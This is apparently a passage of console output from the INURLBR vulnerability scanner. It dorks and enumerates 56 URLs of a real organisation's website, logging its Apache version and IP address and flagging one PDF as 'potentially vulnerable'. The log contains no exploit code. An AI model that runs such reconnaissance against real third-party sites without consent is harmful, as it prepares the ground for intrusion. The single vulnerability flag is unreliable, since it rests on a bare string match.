797. __[ ! ] Help: php inurlbr.php --help
798. ------------------------------------------------------------------------------------------------------------------------
799.  
800. [ ! ] Starting SCANNER INURLBR 2.1 at [05-01-2018 17:13:45]
801. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
802. It is the end user's responsibility to obey all applicable local, state and federal laws.
803. Developers assume no liability and are not responsible for any misuse or damage caused by this program
804.  
805. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-gldf.org.txt ]
806. [ INFO ][ DORK ]::[ site:gldf.org ]
807. [ INFO ][ SEARCHING ]:: {
808. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.et ]
809.  
810. [ INFO ][ SEARCHING ]:: 
811. -[:::]
812. [ INFO ][ ENGINE ]::[ GOOGLE API ]
813.  
814. [ INFO ][ SEARCHING ]:: 
815. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
816. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.ae ID: 007843865286850066037:b0heuatvay8 ]
817.  
818. [ INFO ][ SEARCHING ]:: 
819. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
820.  
821. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
822.  
823. 
824.  _[ - ]::--------------------------------------------------------------------------------------------------------------
825. |_[ + ] [ 0 / 100 ]-[17:13:59] [ - ] 
826. |_[ + ] Target:: [ https://www.gldf.org/ ]
827. |_[ + ] Exploit:: 
828. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
829. |_[ + ] More details::  / - / , ISP: 
830. |_[ + ] Found:: UNIDENTIFIED
831. 
832.  _[ - ]::--------------------------------------------------------------------------------------------------------------
833. |_[ + ] [ 1 / 100 ]-[17:14:00] [ - ] 
834. |_[ + ] Target:: [ https://www.gldf.org/en/ ]
835. |_[ + ] Exploit:: 
836. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
837. |_[ + ] More details::  / - / , ISP: 
838. |_[ + ] Found:: UNIDENTIFIED
839. 
840.  _[ - ]::--------------------------------------------------------------------------------------------------------------
841. |_[ + ] [ 2 / 100 ]-[17:14:01] [ - ] 
842. |_[ + ] Target:: [ https://www.gldf.org/es ]
843. |_[ + ] Exploit:: 
844. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
845. |_[ + ] More details::  / - / , ISP: 
846. |_[ + ] Found:: UNIDENTIFIED
847. 
848.  _[ - ]::--------------------------------------------------------------------------------------------------------------
849. |_[ + ] [ 3 / 100 ]-[17:14:03] [ - ] 
850. |_[ + ] Target:: [ https://www.gldf.org/presse.html ]
851. |_[ + ] Exploit:: 
852. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
853. |_[ + ] More details::  / - / , ISP: 
854. |_[ + ] Found:: UNIDENTIFIED
855. 
856.  _[ - ]::--------------------------------------------------------------------------------------------------------------
857. |_[ + ] [ 4 / 100 ]-[17:14:04] [ - ] 
858. |_[ + ] Target:: [ https://www.gldf.org/glossaire.html ]
859. |_[ + ] Exploit:: 
860. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
861. |_[ + ] More details::  / - / , ISP: 
862. |_[ + ] Found:: UNIDENTIFIED
863. 
864.  _[ - ]::--------------------------------------------------------------------------------------------------------------
865. |_[ + ] [ 5 / 100 ]-[17:14:05] [ - ] 
866. |_[ + ] Target:: [ https://www.gldf.org/mentions-legales/ ]
867. |_[ + ] Exploit:: 
868. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
869. |_[ + ] More details::  / - / , ISP: 
870. |_[ + ] Found:: UNIDENTIFIED
871. 
872.  _[ - ]::--------------------------------------------------------------------------------------------------------------
873. |_[ + ] [ 6 / 100 ]-[17:14:06] [ - ] 
874. |_[ + ] Target:: [ https://www.gldf.org/mon-compte.html ]
875. |_[ + ] Exploit:: 
876. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
877. |_[ + ] More details::  / - / , ISP: 
878. |_[ + ] Found:: UNIDENTIFIED
879. 
880.  _[ - ]::--------------------------------------------------------------------------------------------------------------
881. |_[ + ] [ 7 / 100 ]-[17:14:08] [ - ] 
882. |_[ + ] Target:: [ https://www.gldf.org/evenement-lyon.html ]
883. |_[ + ] Exploit:: 
884. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
885. |_[ + ] More details::  / - / , ISP: 
886. |_[ + ] Found:: UNIDENTIFIED
887. 
888.  _[ - ]::--------------------------------------------------------------------------------------------------------------
889. |_[ + ] [ 8 / 100 ]-[17:14:09] [ - ] 
890. |_[ + ] Target:: [ https://www.gldf.org/presse/?no_cache=1 ]
891. |_[ + ] Exploit:: 
892. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
893. |_[ + ] More details::  / - / , ISP: 
894. |_[ + ] Found:: UNIDENTIFIED
895. 
896.  _[ - ]::--------------------------------------------------------------------------------------------------------------
897. |_[ + ] [ 9 / 100 ]-[17:14:11] [ - ] 
898. |_[ + ] Target:: [ https://www.gldf.org/plan-du-site.html ]
899. |_[ + ] Exploit:: 
900. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
901. |_[ + ] More details::  / - / , ISP: 
902. |_[ + ] Found:: UNIDENTIFIED
903. 
904.  _[ - ]::--------------------------------------------------------------------------------------------------------------
905. |_[ + ] [ 10 / 100 ]-[17:14:12] [ - ] 
906. |_[ + ] Target:: [ https://www.gldf.org/mon-compte/inscription.html ]
907. |_[ + ] Exploit:: 
908. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
909. |_[ + ] More details::  / - / , ISP: 
910. |_[ + ] Found:: UNIDENTIFIED
911. 
912.  _[ - ]::--------------------------------------------------------------------------------------------------------------
913. |_[ + ] [ 11 / 100 ]-[17:14:14] [ - ] 
914. |_[ + ] Target:: [ https://www.gldf.org/contacts/formulaire-de-contact.html ]
915. |_[ + ] Exploit:: 
916. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
917. |_[ + ] More details::  / - / , ISP: 
918. |_[ + ] Found:: UNIDENTIFIED
919. 
920.  _[ - ]::--------------------------------------------------------------------------------------------------------------
921. |_[ + ] [ 12 / 100 ]-[17:14:15] [ - ] 
922. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/colloques.html ]
923. |_[ + ] Exploit:: 
924. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
925. |_[ + ] More details::  / - / , ISP: 
926. |_[ + ] Found:: UNIDENTIFIED
927. 
928.  _[ - ]::--------------------------------------------------------------------------------------------------------------
929. |_[ + ] [ 13 / 100 ]-[17:14:16] [ - ] 
930. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/patrimoine/diaporama.html ]
931. |_[ + ] Exploit:: 
932. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
933. |_[ + ] More details::  / - / , ISP: 
934. |_[ + ] Found:: UNIDENTIFIED
935. 
936.  _[ - ]::--------------------------------------------------------------------------------------------------------------
937. |_[ + ] [ 14 / 100 ]-[17:14:18] [ - ] 
938. |_[ + ] Target:: [ https://www.gldf.org/contacts/gldf-ou-sommes-nous.html ]
939. |_[ + ] Exploit:: 
940. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
941. |_[ + ] More details::  / - / , ISP: 
942. |_[ + ] Found:: UNIDENTIFIED
943. 
944.  _[ - ]::--------------------------------------------------------------------------------------------------------------
945. |_[ + ] [ 15 / 100 ]-[17:14:19] [ - ] 
946. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/evenements.html ]
947. |_[ + ] Exploit:: 
948. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
949. |_[ + ] More details::  / - / , ISP: 
950. |_[ + ] Found:: UNIDENTIFIED
951. 
952.  _[ - ]::--------------------------------------------------------------------------------------------------------------
953. |_[ + ] [ 16 / 100 ]-[17:14:20] [ - ] 
954. |_[ + ] Target:: [ https://www.gldf.org/newsletter/newsletter-gldf-n59-fevrier-2016/ ]
955. |_[ + ] Exploit:: 
956. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
957. |_[ + ] More details::  / - / , ISP: 
958. |_[ + ] Found:: UNIDENTIFIED
959. 
960.  _[ - ]::--------------------------------------------------------------------------------------------------------------
961. |_[ + ] [ 17 / 100 ]-[17:14:21] [ - ] 
962. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html ]
963. |_[ + ] Exploit:: 
964. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
965. |_[ + ] More details::  / - / , ISP: 
966. |_[ + ] Found:: UNIDENTIFIED
967. 
968.  _[ - ]::--------------------------------------------------------------------------------------------------------------
969. |_[ + ] [ 18 / 100 ]-[17:14:23] [ - ] 
970. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html ]
971. |_[ + ] Exploit:: 
972. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
973. |_[ + ] More details::  / - / , ISP: 
974. |_[ + ] Found:: UNIDENTIFIED
975. 
976.  _[ - ]::--------------------------------------------------------------------------------------------------------------
977. |_[ + ] [ 19 / 100 ]-[17:14:24] [ - ] 
978. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne.html ]
979. |_[ + ] Exploit:: 
980. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
981. |_[ + ] More details::  / - / , ISP: 
982. |_[ + ] Found:: UNIDENTIFIED
983. 
984.  _[ - ]::--------------------------------------------------------------------------------------------------------------
985. |_[ + ] [ 20 / 100 ]-[17:14:25] [ - ] 
986. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/bibliotheque/presentation.html ]
987. |_[ + ] Exploit:: 
988. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
989. |_[ + ] More details::  / - / , ISP: 
990. |_[ + ] Found:: UNIDENTIFIED
991. 
992.  _[ - ]::--------------------------------------------------------------------------------------------------------------
993. |_[ + ] [ 21 / 100 ]-[17:14:26] [ - ] 
994. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/actualites.html ]
995. |_[ + ] Exploit:: 
996. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
997. |_[ + ] More details::  / - / , ISP: 
998. |_[ + ] Found:: UNIDENTIFIED
999. 
1000.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1001. |_[ + ] [ 22 / 100 ]-[17:14:27] [ - ] 
1002. |_[ + ] Target:: [ https://www.gldf.org/newsletter/newsletter-gldf-n58-janvier-2016.html ]
1003. |_[ + ] Exploit:: 
1004. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1005. |_[ + ] More details::  / - / , ISP: 
1006. |_[ + ] Found:: UNIDENTIFIED
1007. 
1008.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1009. |_[ + ] [ 23 / 100 ]-[17:14:28] [ - ] 
1010. |_[ + ] Target:: [ https://www.gldf.org/newsletter/newsletter-gldf-n68-janvier-2017.html ]
1011. |_[ + ] Exploit:: 
1012. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1013. |_[ + ] More details::  / - / , ISP: 
1014. |_[ + ] Found:: UNIDENTIFIED
1015. 
1016.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1017. |_[ + ] [ 24 / 100 ]-[17:14:30] [ - ] 
1018. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/linitiation-en-gldf.html ]
1019. |_[ + ] Exploit:: 
1020. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1021. |_[ + ] More details::  / - / , ISP: 
1022. |_[ + ] Found:: UNIDENTIFIED
1023. 
1024.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1025. |_[ + ] [ 25 / 100 ]-[17:14:31] [ - ] 
1026. |_[ + ] Target:: [ https://www.gldf.org/contacts/visiter-la-gldf-infos-pratiques.html ]
1027. |_[ + ] Exploit:: 
1028. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1029. |_[ + ] More details::  / - / , ISP: 
1030. |_[ + ] Found:: UNIDENTIFIED
1031. 
1032.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1033. |_[ + ] [ 26 / 100 ]-[17:14:32] [ - ] 
1034. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/presentation-du-mab.html ]
1035. |_[ + ] Exploit:: 
1036. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1037. |_[ + ] More details::  / - / , ISP: 
1038. |_[ + ] Found:: UNIDENTIFIED
1039. 
1040.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1041. |_[ + ] [ 27 / 100 ]-[17:14:33] [ - ] 
1042. |_[ + ] Target:: [ https://www.gldf.org/newsletter/newsletter-gldf-n70-mai-2017.html ]
1043. |_[ + ] Exploit:: 
1044. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1045. |_[ + ] More details::  / - / , ISP: 
1046. |_[ + ] Found:: UNIDENTIFIED
1047. 
1048.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1049. |_[ + ] [ 28 / 100 ]-[17:14:34] [ - ] 
1050. |_[ + ] Target:: [ https://www.gldf.org/newsletter/newsletter-gldf-n62-mai-2016.html ]
1051. |_[ + ] Exploit:: 
1052. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1053. |_[ + ] More details::  / - / , ISP: 
1054. |_[ + ] Found:: UNIDENTIFIED
1055. 
1056.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1057. |_[ + ] [ 29 / 100 ]-[17:14:35] [ - ] 
1058. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/bibliotheque/selection-douvrages.html ]
1059. |_[ + ] Exploit:: 
1060. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1061. |_[ + ] More details::  / - / , ISP: 
1062. |_[ + ] Found:: UNIDENTIFIED
1063. 
1064.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1065. |_[ + ] [ 30 / 100 ]-[17:14:37] [ - ] 
1066. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/publications/memoires-de-la-gldf/ ]
1067. |_[ + ] Exploit:: 
1068. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1069. |_[ + ] More details::  / - / , ISP: 
1070. |_[ + ] Found:: UNIDENTIFIED
1071. 
1072.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1073. |_[ + ] [ 31 / 100 ]-[17:14:38] [ - ] 
1074. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/colloques/videos.html ]
1075. |_[ + ] Exploit:: 
1076. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1077. |_[ + ] More details::  / - / , ISP: 
1078. |_[ + ] Found:: UNIDENTIFIED
1079. 
1080.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1081. |_[ + ] [ 32 / 100 ]-[17:14:39] [ - ] 
1082. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/panier.html ]
1083. |_[ + ] Exploit:: 
1084. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1085. |_[ + ] More details::  / - / , ISP: 
1086. |_[ + ] Found:: UNIDENTIFIED
1087. 
1088.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1089. |_[ + ] [ 33 / 100 ]-[17:14:40] [ - ] 
1090. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dklikbrochures/Connaitre_la_GLDF_01.pdf ]
1091. |_[ + ] Exploit:: 
1092. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1093. |_[ + ] More details::  / - / , ISP: 
1094. |_[ + ] Found:: UNIDENTIFIED
1095. 
1096.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1097. |_[ + ] [ 34 / 100 ]-[17:14:43] [ - ] 
1098. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dklikbrochures/Bulletin_ICOM__5.pdf ]
1099. |_[ + ] Exploit:: 
1100. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1101. |_[ + ] More details::  / - / , ISP: 
1102. |_[ + ] Found:: UNIDENTIFIED
1103. 
1104.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1105. |_[ + ] [ 35 / 100 ]-[17:14:45] [ - ] 
1106. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dklikbrochures/Programme_SMARTS_Lyon_2018_officiel.pdf ]
1107. |_[ + ] Exploit:: 
1108. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1109. |_[ + ] More details::  / - / , ISP: 
1110. |_[ + ] Found:: UNIDENTIFIED
1111. 
1112.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1113. |_[ + ] [ 36 / 100 ]-[17:14:47] [ ! ] 
1114. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  https://www.gldf.org/uploads/tx_dklikbrochures/DP_GLDF.pdf ]
1115. |_[ + ] Exploit:: 
1116. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1117. |_[ + ] More details::  / - / , ISP: 
1118. |_[ + ] Found::  POSTGRESQL-06 - VALUE: pg_
1119. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-gldf.org.txt
1120. 
1121.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1122. |_[ + ] [ 37 / 100 ]-[17:14:49] [ - ] 
1123. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dklikbrochures/Bulletin_ICOM__1.pdf ]
1124. |_[ + ] Exploit:: 
1125. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1126. |_[ + ] More details::  / - / , ISP: 
1127. |_[ + ] Found:: UNIDENTIFIED
1128. 
1129.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1130. |_[ + ] [ 38 / 100 ]-[17:14:50] [ - ] 
1131. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/journees-arts-maconniques.html ]
1132. |_[ + ] Exploit:: 
1133. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1134. |_[ + ] More details::  / - / , ISP: 
1135. |_[ + ] Found:: UNIDENTIFIED
1136. 
1137.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1138. |_[ + ] [ 39 / 100 ]-[17:14:51] [ - ] 
1139. |_[ + ] Target:: [ https://www.gldf.org/newsletter/la-lettre-pvi-n2-mars-2016.html ]
1140. |_[ + ] Exploit:: 
1141. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1142. |_[ + ] More details::  / - / , ISP: 
1143. |_[ + ] Found:: UNIDENTIFIED
1144. 
1145.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1146. |_[ + ] [ 40 / 100 ]-[17:14:52] [ - ] 
1147. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/evenement-icom-2017.html ]
1148. |_[ + ] Exploit:: 
1149. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1150. |_[ + ] More details::  / - / , ISP: 
1151. |_[ + ] Found:: UNIDENTIFIED
1152. 
1153.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1154. |_[ + ] [ 41 / 100 ]-[17:14:54] [ - ] 
1155. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/evenements/fiche-evenement.html ]
1156. |_[ + ] Exploit:: 
1157. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1158. |_[ + ] More details::  / - / , ISP: 
1159. |_[ + ] Found:: UNIDENTIFIED
1160. 
1161.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1162. |_[ + ] [ 42 / 100 ]-[17:14:55] [ - ] 
1163. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=7 ]
1164. |_[ + ] Exploit:: 
1165. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1166. |_[ + ] More details::  / - / , ISP: 
1167. |_[ + ] Found:: UNIDENTIFIED
1168. 
1169.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1170. |_[ + ] [ 43 / 100 ]-[17:14:56] [ - ] 
1171. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=15 ]
1172. |_[ + ] Exploit:: 
1173. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1174. |_[ + ] More details::  / - / , ISP: 
1175. |_[ + ] Found:: UNIDENTIFIED
1176. 
1177.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1178. |_[ + ] [ 44 / 100 ]-[17:14:57] [ - ] 
1179. |_[ + ] Target:: [ https://www.gldf.org/contacts/gldf-ou-sommes-nous/?no_cache=1 ]
1180. |_[ + ] Exploit:: 
1181. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1182. |_[ + ] More details::  / - / , ISP: 
1183. |_[ + ] Found:: UNIDENTIFIED
1184. 
1185.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1186. |_[ + ] [ 45 / 100 ]-[17:14:59] [ - ] 
1187. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=11 ]
1188. |_[ + ] Exploit:: 
1189. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1190. |_[ + ] More details::  / - / , ISP: 
1191. |_[ + ] Found:: UNIDENTIFIED
1192. 
1193.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1194. |_[ + ] [ 46 / 100 ]-[17:15:00] [ - ] 
1195. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=17 ]
1196. |_[ + ] Exploit:: 
1197. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1198. |_[ + ] More details::  / - / , ISP: 
1199. |_[ + ] Found:: UNIDENTIFIED
1200. 
1201.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1202. |_[ + ] [ 47 / 100 ]-[17:15:01] [ - ] 
1203. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dkactus/ComPresseBilanColloque.pdf ]
1204. |_[ + ] Exploit:: 
1205. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1206. |_[ + ] More details::  / - / , ISP: 
1207. |_[ + ] Found:: UNIDENTIFIED
1208. 
1209.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1210. |_[ + ] [ 48 / 100 ]-[17:15:03] [ - ] 
1211. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=14 ]
1212. |_[ + ] Exploit:: 
1213. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1214. |_[ + ] More details::  / - / , ISP: 
1215. |_[ + ] Found:: UNIDENTIFIED
1216. 
1217.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1218. |_[ + ] [ 49 / 100 ]-[17:15:04] [ - ] 
1219. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/inscription-evenement-gldf.html ]
1220. |_[ + ] Exploit:: 
1221. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1222. |_[ + ] More details::  / - / , ISP: 
1223. |_[ + ] Found:: UNIDENTIFIED
1224. 
1225.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1226. |_[ + ] [ 50 / 100 ]-[17:15:05] [ - ] 
1227. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=16 ]
1228. |_[ + ] Exploit:: 
1229. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1230. |_[ + ] More details::  / - / , ISP: 
1231. |_[ + ] Found:: UNIDENTIFIED
1232. 
1233.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1234. |_[ + ] [ 51 / 100 ]-[17:15:07] [ - ] 
1235. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=12 ]
1236. |_[ + ] Exploit:: 
1237. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1238. |_[ + ] More details::  / - / , ISP: 
1239. |_[ + ] Found:: UNIDENTIFIED
1240. 
1241.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1242. |_[ + ] [ 52 / 100 ]-[17:15:08] [ - ] 
1243. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/ouvrages-gldf.html ]
1244. |_[ + ] Exploit:: 
1245. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1246. |_[ + ] More details::  / - / , ISP: 
1247. |_[ + ] Found:: UNIDENTIFIED
1248. 
1249.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1250. |_[ + ] [ 53 / 100 ]-[17:15:10] [ - ] 
1251. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=19 ]
1252. |_[ + ] Exploit:: 
1253. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1254. |_[ + ] More details::  / - / , ISP: 
1255. |_[ + ] Found:: UNIDENTIFIED
1256. 
1257.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1258. |_[ + ] [ 54 / 100 ]-[17:15:11] [ - ] 
1259. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=13 ]
1260. |_[ + ] Exploit:: 
1261. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1262. |_[ + ] More details::  / - / , ISP: 
1263. |_[ + ] Found:: UNIDENTIFIED
1264. 
1265.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1266. |_[ + ] [ 55 / 100 ]-[17:15:13] [ - ] 
1267. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?cat_media=9 ]
1268. |_[ + ] Exploit:: 
1269. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1270. |_[ + ] More details::  / - / , ISP: 
1271. |_[ + ] Found:: UNIDENTIFIED
1272. 
1273.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1274. |_[ + ] [ 56 / 100 ]-[17:15:15] [ - ] 
1275. |_[ + ] Target:: [ https://www.gldf.org/uploads/tx_dkactus/Bon_de_commande_du_livre.pdf ]
1276. |_[ + ] Exploit:: 
1277. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1278. |_[ + ] More details::  / - / , ISP: 
1279. |_[ + ] Found:: UNIDENTIFIED
1280. 
1281.  _[ - ]::--------------------------------------------------------------------------------------------------------------
